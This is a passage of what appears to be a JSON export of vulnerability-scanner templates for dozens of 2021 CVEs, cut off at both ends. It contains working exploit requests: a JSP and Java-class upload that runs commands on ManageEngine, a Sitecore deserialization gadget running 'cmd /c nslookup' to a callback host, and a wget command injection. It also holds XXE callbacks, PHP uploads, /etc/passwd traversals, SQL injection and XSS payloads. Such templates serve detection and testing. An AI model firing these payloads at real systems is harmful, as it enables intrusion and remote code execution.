Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo 'CVE-2021-24145'; ?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'CVE-2021-24145')"],"condition":"and"}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET 